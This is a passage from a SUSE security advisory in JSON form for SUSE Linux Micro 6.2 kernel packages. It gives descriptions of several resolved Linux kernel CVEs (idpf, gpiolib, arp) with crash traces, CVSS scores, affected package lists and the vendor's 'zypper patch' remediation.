dereference, address: 0000000000000000\n[89408.371908] #PF: supervisor read access in kernel mode\n[89408.371924] #PF: error_code(0x0000) - not-present page\n[89408.371940] PGD 0 P4D 0\n[89408.371953] Oops: Oops: 0000 [#1] SMP NOPTI\n\u003csnip\u003e\n[89408.372052] RIP: 0010:memcpy_orig+0x16/0x130\n[89408.372310] Call Trace:\n[89408.372317] \u003cTASK\u003e\n[89408.372326] ? idpf_set_features+0xfc/0x180 [idpf]\n[89408.372363] __netdev_update_features+0x295/0xde0\n[89408.372384] ethnl_set_features+0x15e/0x460\n[89408.372406] genl_family_rcv_msg_doit+0x11f/0x180\n[89408.372429] genl_rcv_msg+0x1ad/0x2b0\n[89408.372446] ? __pfx_ethnl_set_features+0x10/0x10\n[89408.372465] ? __pfx_genl_rcv_msg+0x10/0x10\n[89408.372482] netlink_rcv_skb+0x58/0x100\n[89408.372502] genl_rcv+0x2c/0x50\n[89408.372516] netlink_unicast+0x289/0x3e0\n[89408.372533] netlink_sendmsg+0x215/0x440\n[89408.372551] __sys_sendto+0x234/0x240\n[89408.372571] __x64_sys_sendto+0x28/0x30\n[89408.372585] x64_sys_call+0x1909/0x1da0\n[89408.372604] do_syscall_64+0x7a/0xfa0\n[89408.373140] ? clear_bhb_loop+0x60/0xb0\n[89408.373647] entry_SYSCALL_64_after_hwframe+0x76/0x7e\n[89408.378887] \u003c/TASK\u003e\n\u003csnip\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22985",
"url": "https://www.suse.com/security/cve/CVE-2026-22985"
},
{
"category": "external",
"summary": "SUSE Bug 1257277 for CVE-2026-22985",
"url": "https://bugzilla.suse.com/1257277"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2026-22985"
},
{
"cve": "CVE-2026-22986",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22986"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ngpiolib: fix race condition for gdev-\u003esrcu\n\nIf two drivers were calling gpiochip_add_data_with_key(), one may be\ntraversing the srcu-protected list in gpio_name_to_desc(), meanwhile\nother has just added its gdev in gpiodev_add_to_list_unlocked().\nThis creates a non-mutexed and non-protected timeframe, when one\ninstance is dereferencing and using \u0026gdev-\u003esrcu, before the other\nhas initialized it, resulting in crash:\n\n[ 4.935481] Unable to handle kernel paging request at virtual address ffff800272bcc000\n[ 4.943396] Mem abort info:\n[ 4.943400] ESR = 0x0000000096000005\n[ 4.943403] EC = 0x25: DABT (current EL), IL = 32 bits\n[ 4.943407] SET = 0, FnV = 0\n[ 4.943410] EA = 0, S1PTW = 0\n[ 4.943413] FSC = 0x05: level 1 translation fault\n[ 4.943416] Data abort info:\n[ 4.943418] ISV = 0, ISS = 0x00000005, ISS2 = 0x00000000\n[ 4.946220] CM = 0, WnR = 0, TnD = 0, TagAccess = 0\n[ 4.955261] GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0\n[ 4.955268] swapper pgtable: 4k pages, 48-bit VAs, pgdp=0000000038e6c000\n[ 4.961449] [ffff800272bcc000] pgd=0000000000000000\n[ 4.969203] , p4d=1000000039739003\n[ 4.979730] , pud=0000000000000000\n[ 4.980210] phandle (CPU): 0x0000005e, phandle (BE): 0x5e000000 for node \"reset\"\n[ 4.991736] Internal error: Oops: 0000000096000005 [#1] PREEMPT SMP\n...\n[ 5.121359] pc : __srcu_read_lock+0x44/0x98\n[ 5.131091] lr : gpio_name_to_desc+0x60/0x1a0\n[ 5.153671] sp : ffff8000833bb430\n[ 5.298440]\n[ 5.298443] Call trace:\n[ 5.298445] __srcu_read_lock+0x44/0x98\n[ 5.309484] gpio_name_to_desc+0x60/0x1a0\n[ 5.320692] gpiochip_add_data_with_key+0x488/0xf00\n 5.946419] ---[ end trace 0000000000000000 ]---\n\nMove initialization code for gdev fields before it is added to\ngpio_devices, with adjacent initialization code.\nAdjust goto statements to reflect modified order of operations\n\n[Bartosz: fixed a build issue, removed stray newline]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22986",
"url": "https://www.suse.com/security/cve/CVE-2026-22986"
},
{
"category": "external",
"summary": "SUSE Bug 1257276 for CVE-2026-22986",
"url": "https://bugzilla.suse.com/1257276"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2026-22986"
},
{
"cve": "CVE-2026-22988",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22988"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\narp: do not assume dev_hard_header() does not change skb-\u003ehead\n\narp_create() is the only dev_hard_header() caller\nmaking assumption about skb-\u003ehead being unchanged.\n\nA recent commit broke this assumption.\n\nInitialize @arp pointer after dev_hard_header() call.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22988",
"url": "https://www.suse.com/security/cve/CVE-2026-22988"
},
{
"category": "external",
"summary": "SUSE Bug 1257282 for CVE-2026-22988",
"url": "https://bugzilla.suse.com/1257282"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2026-22988"
},
{
"cve": "CVE-2026-22989",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22989"
}
],
"notes": [
{
"category": "general",
